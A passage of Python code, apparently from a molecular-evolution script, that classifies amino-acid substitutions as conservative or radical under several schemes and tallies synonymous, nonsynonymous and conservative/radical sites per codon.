T","P"):"C",("W","P"):"R",("Y","P"):"R",("V","P"):"R",("T","S"):"C",("W","S"):"R",("Y","S"):"R",("V","S"):"R",("W","T"):"R",("Y","T"):"R",("V","T"):"R",("Y","W"):"C",("V","W"):"R",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"}
aaSchemeDict5 = {("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"C",("A","C"):"C",("A","Q"):"C",("A","G"):"C",("A","I"):"C",("A","L"):"C",("A","M"):"C",("A","F"):"R",("A","P"):"C",("A","S"):"C",("A","T"):"C",("A","W"):"R",("A","Y"):"R",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"C",("N","I"):"C",("N","L"):"C",("N","M"):"C",("N","F"):"R",("N","P"):"C",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"R",("N","V"):"C",("C","Q"):"C",("C","G"):"C",("C","I"):"C",("C","L"):"C",("C","M"):"C",("C","F"):"R",("C","P"):"C",("C","S"):"C",("C","T"):"C",("C","W"):"R",("C","Y"):"R",("C","V"):"C",("Q","G"):"C",("Q","I"):"C",("Q","L"):"C",("Q","M"):"C",("Q","F"):"R",("Q","P"):"C",("Q","S"):"C",("Q","T"):"C",("Q","W"):"R",("Q","Y"):"R",("Q","V"):"C",("G","I"):"C",("G","L"):"C",("G","M"):"C",("G","F"):"R",("G","P"):"C",("G","S"):"C",("G","T"):"C",("G","W"):"R",("G","Y"):"R",("G","V"):"C",("I","L"):"C",("I","M"):"C",("I","F"):"R",("I","P"):"C",("I","S"):"C",("I","T"):"C",("I","W"):"R",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"R",("L","P"):"C",("L","S"):"C",("L","T"):"C",("L","W"):"R",("L","Y"):"R",("L","V"):"C",("M","F"):"R",("M","P"):"C",("M","S"):"C",("M","T"):"C",("M","W"):"R",("M","Y"):"R",("M","V"):"C",("F","P"):"R",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"C",("F","V"):"R",("P","S"):"C",("P","T"):"C",("P","W"):"R",("P","Y"):"R",("P","V"):"C",("S","T"):"C",("S","W"):"R",("S","Y"):"R",("S","V"):"R",("T","W"):"R",("T","Y"):"R",("T","V"):"C",("W","Y"):"C",("W","V"):"R",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"C",("C","A"):"C",("Q","A"):"C",("G","A"):"C",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"R",("P","A"):"C",("S","A"):"C",("T","A"):"C",("W","A"):"R",("Y","A"):"R",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"C",("I","N"):"C",("L","N"):"C",("M","N"):"C",("F","N"):"R",("P","N"):"C",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"R",("V","N"):"C",("Q","C"):"C",("G","C"):"C",("I","C"):"C",("L","C"):"C",("M","C"):"C",("F","C"):"R",("P","C"):"C",("S","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"R",("V","C"):"C",("G","Q"):"C",("I","Q"):"C",("L","Q"):"C",("M","Q"):"C",("F","Q"):"R",("P","Q"):"C",("S","Q"):"C",("T","Q"):"C",("W","Q"):"R",("Y","Q"):"R",("V","Q"):"C",("I","G"):"C",("L","G"):"C",("M","G"):"C",("F","G"):"R",("P","G"):"C",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"R",("V","G"):"C",("L","I"):"C",("M","I"):"C",("F","I"):"R",("P","I"):"C",("S","I"):"C",("T","I"):"C",("W","I"):"R",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"R",("P","L"):"C",("S","L"):"C",("T","L"):"C",("W","L"):"R",("Y","L"):"R",("V","L"):"C",("F","M"):"R",("P","M"):"C",("S","M"):"C",("T","M"):"C",("W","M"):"R",("Y","M"):"R",("V","M"):"C",("P","F"):"R",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"C",("V","F"):"R",("S","P"):"C",("T","P"):"C",("W","P"):"R",("Y","P"):"R",("V","P"):"C",("T","S"):"C",("W","S"):"R",("Y","S"):"R",("V","S"):"R",("W","T"):"R",("Y","T"):"R",("V","T"):"C",("Y","W"):"C",("V","W"):"R",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"}
aaSchemeDict6 = {("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"R",("A","C"):"R",("A","Q"):"R",("A","G"):"C",("A","I"):"C",("A","L"):"C",("A","M"):"C",("A","F"):"C",("A","P"):"C",("A","S"):"R",("A","T"):"R",("A","W"):"C",("A","Y"):"R",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"R",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"R",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"C",("N","V"):"R",("C","Q"):"C",("C","G"):"R",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"R",("C","S"):"C",("C","T"):"C",("C","W"):"R",("C","Y"):"C",("C","V"):"R",("Q","G"):"R",("Q","I"):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"R",("Q","P"):"R",("Q","S"):"C",("Q","T"):"C",("Q","W"):"R",("Q","Y"):"C",("Q","V"):"R",("G","I"):"C",("G","L"):"C",("G","M"):"C",("G","F"):"C",("G","P"):"C",("G","S"):"R",("G","T"):"R",("G","W"):"C",("G","Y"):"R",("G","V"):"C",("I","L"):"C",("I","M"):"C",("I","F"):"C",("I","P"):"C",("I","S"):"R",("I","T"):"R",("I","W"):"C",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"C",("L","P"):"C",("L","S"):"R",("L","T"):"R",("L","W"):"C",("L","Y"):"R",("L","V"):"C",("M","F"):"C",("M","P"):"C",("M","S"):"R",("M","T"):"R",("M","W"):"C",("M","Y"):"R",("M","V"):"C",("F","P"):"C",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"R",("F","V"):"C",("P","S"):"R",("P","T"):"R",("P","W"):"C",("P","Y"):"R",("P","V"):"C",("S","T"):"C",("S","W"):"R",("S","Y"):"C",("S","V"):"R",("T","W"):"R",("T","Y"):"C",("T","V"):"R",("W","Y"):"R",("W","V"):"C",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"R",("C","A"):"R",("Q","A"):"R",("G","A"):"C",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"C",("P","A"):"C",("S","A"):"R",("T","A"):"R",("W","A"):"C",("Y","A"):"R",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"R",("I","N"):"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"R",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"C",("V","N"):"R",("Q","C"):"C",("G","C"):"R",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"R",("S","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"C",("V","C"):"R",("G","Q"):"R",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"R",("P","Q"):"R",("S","Q"):"C",("T","Q"):"C",("W","Q"):"R",("Y","Q"):"C",("V","Q"):"R",("I","G"):"C",("L","G"):"C",("M","G"):"C",("F","G"):"C",("P","G"):"C",("S","G"):"R",("T","G"):"R",("W","G"):"C",("Y","G"):"R",("V","G"):"C",("L","I"):"C",("M","I"):"C",("F","I"):"C",("P","I"):"C",("S","I"):"R",("T","I"):"R",("W","I"):"C",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"C",("P","L"):"C",("S","L"):"R",("T","L"):"R",("W","L"):"C",("Y","L"):"R",("V","L"):"C",("F","M"):"C",("P","M"):"C",("S","M"):"R",("T","M"):"R",("W","M"):"C",("Y","M"):"R",("V","M"):"C",("P","F"):"C",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"R",("V","F"):"C",("S","P"):"R",("T","P"):"R",("W","P"):"C",("Y","P"):"R",("V","P"):"C",("T","S"):"C",("W","S"):"R",("Y","S"):"C",("V","S"):"R",("W","T"):"R",("Y","T"):"C",("V","T"):"R",("Y","W"):"R",("V","W"):"C",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"}
aaSchemeDict7 = {("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"R",("A","C"):"R",("A","Q"):"R",("A","G"):"R",("A","I"):"C",("A","L"):"C",("A","M"):"C",("A","F"):"C",("A","P"):"C",("A","S"):"R",("A","T"):"R",("A","W"):"C",("A","Y"):"R",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"C",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"R",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"C",("N","V"):"R",("C","Q"):"C",("C","G"):"C",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"R",("C","S"):"C",("C","T"):"C",("C","W"):"R",("C","Y"):"C",("C","V"):"R",("Q","G"):"C",("Q","I"):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"R",("Q","P"):"R",("Q","S"):"C",("Q","T"):"C",("Q","W"):"R",("Q","Y"):"C",("Q","V"):"R",("G","I"):"R",("G","L"):"R",("G","M"):"R",("G","F"):"R",("G","P"):"R",("G","S"):"C",("G","T"):"C",("G","W"):"R",("G","Y"):"C",("G","V"):"R",("I","L"):"C",("I","M"):"C",("I","F"):"C",("I","P"):"C",("I","S"):"R",("I","T"):"R",("I","W"):"C",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"C",("L","P"):"C",("L","S"):"R",("L","T"):"R",("L","W"):"C",("L","Y"):"R",("L","V"):"C",("M","F"):"C",("M","P"):"C",("M","S"):"R",("M","T"):"R",("M","W"):"C",("M","Y"):"R",("M","V"):"C",("F","P"):"C",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"R",("F","V"):"C",("P","S"):"R",("P","T"):"R",("P","W"):"C",("P","Y"):"R",("P","V"):"C",("S","T"):"C",("S","W"):"R",("S","Y"):"C",("S","V"):"R",("T","W"):"R",("T","Y"):"C",("T","V"):"R",("W","Y"):"R",("W","V"):"C",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"R",("C","A"):"R",("Q","A"):"R",("G","A"):"R",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"C",("P","A"):"C",("S","A"):"R",("T","A"):"R",("W","A"):"C",("Y","A"):"R",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"C",("I","N"):"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"R",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"C",("V","N"):"R",("Q","C"):"C",("G","C"):"C",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"R",("S","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"C",("V","C"):"R",("G","Q"):"C",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"R",("P","Q"):"R",("S","Q"):"C",("T","Q"):"C",("W","Q"):"R",("Y","Q"):"C",("V","Q"):"R",("I","G"):"R",("L","G"):"R",("M","G"):"R",("F","G"):"R",("P","G"):"R",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"C",("V","G"):"R",("L","I"):"C",("M","I"):"C",("F","I"):"C",("P","I"):"C",("S","I"):"R",("T","I"):"R",("W","I"):"C",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"C",("P","L"):"C",("S","L"):"R",("T","L"):"R",("W","L"):"C",("Y","L"):"R",("V","L"):"C",("F","M"):"C",("P","M"):"C",("S","M"):"R",("T","M"):"R",("W","M"):"C",("Y","M"):"R",("V","M"):"C",("P","F"):"C",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"R",("V","F"):"C",("S","P"):"R",("T","P"):"R",("W","P"):"C",("Y","P"):"R",("V","P"):"C",("T","S"):"C",("W","S"):"R",("Y","S"):"C",("V","S"):"R",("W","T"):"R",("Y","T"):"C",("V","T"):"R",("Y","W"):"R",("V","W"):"C",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"}
totalSynSites = 0.0
totalNonsynSites = 0.0
totalC1Sites = 0.0
totalR1Sites = 0.0
totalC2Sites = 0.0
totalR2Sites = 0.0
totalC3Sites = 0.0
totalR3Sites = 0.0
totalC4Sites = 0.0
totalR4Sites = 0.0
totalC5Sites = 0.0
totalR5Sites = 0.0
totalC6Sites = 0.0
totalR6Sites = 0.0
totalC7Sites = 0.0
totalR7Sites = 0.0
totalMeanCSites = 0.0
totalMeanRSites = 0.0
codonNum = 0
for codon in codonList:
if 'N' in codon or '-' in codon:
totalSynSites += 0.729166667
totalNonsynSites += 2.270833333
totalC1Sites += 1.395833333
totalR1Sites += 0.875
totalC2Sites += 1.270833333
totalR2Sites += 1
totalC3Sites += 0.708333333
totalR3Sites += 1.5625
totalC4Sites += 0.895833333
totalR4Sites += 1.375
totalC5Sites += 1.0625
totalR5Sites += 1.208333333
totalC6Sites += 0.854166667
totalR6Sites += 1.416666667
totalC7Sites += 0.8125
totalR7Sites += 1.458333333
totalMeanCSites += 1.0
totalMeanRSites += 1.270833333
else:
currS = 0.0
currN = 0.0
currC1 = 0.0
currC2 = 0.0
currC3 = 0.0
currC4 = 0.0
currC5 = 0.0
currC6 = 0.0
currC7 = 0.0
currR1 = 0.0
currR2 = 0.0
currR3 = 0.0
currR4 = 0.0
currR5 = 0.0
currR6 = 0.0
currR7 = 0.0
currMeanC = 0.0
currMeanR = 0.0
site1 = codon[0]
site2 = codon[1]
site3 = codon[2]
if site1 == 'A':
mut1 = 'C' + site2 + site3
mut2 = 'G' + site2 + site3
mut3 = 'T' + site2 + site3
elif site1 == 'C':
mut1 = 'A' + site2 + site3
mut2 = 'G' + site2 + site3
mut3 = 'T' + site2 + site3
elif site1 == 'G':
mut1 = 'A' + site2 + site3
mut2 = 'C' + site2 + site3
mut3 = 'T' + site2 + site3
elif site1 == 'T':
mut1 = 'A' + site2 + site3
mut2 = 'C' + site2 + site3
mut3 = 'G' + site2 + site3
if site2 == 'A':
mut4 = site1 + 'C' + site3
mut5 = site1 + 'G' + site3
mut6 = site1 + 'T' + site3
elif site2 == 'C':
mut4 = site1 + 'A' + site3
mut5 = site1 + 'G' + site3
mut6 = site1 + 'T' + site3
elif site2 == 'G':
mut4 = site1 + 'A' + site3
mut5 = site1 + 'C' + site3
mut6 = site1 + 'T' + site3
elif site2 == 'T':
mut4 = site1 + 'A' + site3
mut5 = site1 + 'C' + site3
mut6 = site1 + 'G' + site3
if site3 == 'A':
mut7 = site1 + site2 + 'C'
mut8 = site1 + site2 + 'G'
mut9 = site1 + site2 + 'T'
elif site3 == 'C':
mut7 = site1 + site2 + 'A'
mut8 = site1 + site2 + 'G'
mut9 = site1 + site2 + 'T'
elif site3 == 'G':
mut7 = site1 + site2 + 'A'
mut8 = site1 + site2 + 'C'
mut9 = site1 + site2 + 'T'
elif site3 == 'T':
mut7 = site1 + site2 + 'A'
mut8 = site1 + site2 + 'C'
mut9 = site1 + site2 + 'G'
if codonNum == 0:
aaList = []
if codon in startCodons:
currAA = 'M'
else:
currAA = geneticCode[codon]
if mut1 in startCodons:
aaList.append('M')
else:
aaList.append(geneticCode[mut1])
if mut2 in startCodons:
aaList.append('M')
else:
aaList.append(geneticCode[mut2])
if mut3 in startCodons:
aaList.append('M')
else:
aaList.append(geneticCode[mut3])
if mut4 in startCodons:
aaList.append('M')
else:
aaList.append(geneticCode[mut4])
if mut5 in startCodons:
aaList.append('M')
else:
aaList.append(geneticCode[mut5])
if mut6 in startCodons:
aaList.append('M')
else:
aaList.append(geneticCode[mut6])
if mut7 in startCodons:
aaList.append('M')
else:
aaList.append(geneticCode[mut7])
if mut8 in startCodons:
aaList.append('M')
else:
aaList.append(geneticCode[mut8])
if mut9 in startCodons:
aaList.append('M')
else:
aaList.append(geneticCode[mut9])
else:
aaList = [geneticCode[mut1],geneticCode[mut2],geneticCode[mut3], geneticCode[mut4],geneticCode[mut5],geneticCode[mut6],geneticCode[mut7],geneticCode[mut8],geneticCode[mut9]]
currAA = geneticCode[codon]
for aa in aaList:
if aa == currAA:
currS += 1.0
else:
currN += 1.0
conRad1 = aaSchemeDict1[(currAA,aa)]
conRad2 = aaSchemeDict2[(currAA,aa)]
conRad3 = aaSchemeDict3[(currAA,aa)]
conRad4 = aaSchemeDict4[(currAA,aa)]
conRad5 = aaSchemeDict5[(currAA,aa)]
conRad6 = aaSchemeDict6[(currAA,aa)]
conRad7 = aaSchemeDict7[(currAA,aa)]
meanConRad = CRI([currAA,aa])
if meanConRad[7] > 0.5:
meanConRad = 'R'
else:
meanConRad = 'C'
if conRad1 == 'R':
currR1 += 1
else:
currC1 += 1
if conRad2 == 'R':
currR2 += 1
else:
currC2 += 1
if conRad3 == 'R':
currR3 += 1
else:
currC3 += 1
if conRad4 == 'R':
currR4 += 1
else:
currC4 += 1
if conRad5 == 'R':
currR5 += 1
else:
currC5 += 1
if conRad6 == 'R':
currR6 += 1
else:
currC6 += 1
if conRad7 == 'R':
currR7 += 1
else:
currC7 += 1
if meanConRad == 'R':
currMeanR += 1
else:
currMeanC += 1
currS /= 3.0
currN /= 3.0
currC1 /= 3.0
currC2 /= 3.0
currC3 /= 3.0
currC4 /= 3.0
currC5 /= 3.0
currC6 /= 3.0
currC7 /= 3.0
currMeanC /= 3.0
currR1 /= 3.0
currR2 /= 3.0
currR3 /= 3.0
currR4 /= 3.0
currR5 /= 3.0
currR6 /= 3.0
currR7 /= 3.0
currMeanR /= 3.0
totalSynSites += currS
totalNonsynSites += currN
totalC1Sites += currC1
totalR1Sites += currR1
totalC2Sites += currC2
totalR2Sites += currR2
totalC3Sites += currC3
totalR3Sites += currR3
totalC4Sites += currC4
totalR4Sites += currR4
totalC5Sites += currC5
